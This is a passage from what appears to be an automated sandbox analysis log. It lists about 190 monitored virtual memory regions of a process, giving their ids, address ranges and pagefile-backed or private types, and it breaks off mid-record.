region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20852 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 20853 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20854 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20855 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20856 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20857 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20858 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20859 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20860 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20861 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20862 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20863 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20864 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20865 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20866 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20867 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20868 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20869 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20870 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20871 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20872 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20873 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20874 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20875 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20876 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20877 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20878 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20879 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20880 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20881 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20882 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20883 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20884 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20885 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20886 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20887 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20888 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20889 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20890 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20891 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20892 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20893 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20894 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20895 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20896 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20897 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20898 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20899 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20900 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20901 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20902 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20903 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20904 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20905 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20906 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20907 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20908 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20909 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 20910 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20911 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20912 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20913 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20914 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20915 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20916 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20917 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20918 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20919 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20920 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20921 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20922 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20923 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20924 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20925 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20926 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20927 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20928 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20929 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20930 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20931 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20932 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20933 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20934 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20935 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20936 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20937 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20938 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20939 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20940 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20941 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20942 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20943 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20944 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20945 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20946 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20947 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 20948 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20949 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20950 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20951 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20952 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20953 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20954 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20955 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20956 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20957 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20958 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20959 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20960 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20961 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20962 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20963 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20964 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20965 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20966 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20967 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 20968 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20969 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20970 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20971 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20972 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 20973 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20974 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20975 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20976 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20977 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20978 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20979 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20980 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20981 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20982 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20983 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20984 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20985 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20986 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20987 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20988 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20989 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20990 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20991 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20992 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20993 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20994 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20995 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20996 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20997 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20998 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20999 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21000 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21001 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21002 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21003 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21004 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21005 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21006 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21007 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21008 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21009 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21010 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21011 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21012 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21013 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21014 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21015 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21016 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21017 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21018 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21019 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21020 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21021 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21022 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21023 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21024 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21025 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21026 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21027 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21028 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21029 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21030 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21031 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21032 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21033 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21034 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21035 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21036 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21037 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21038 start_va = 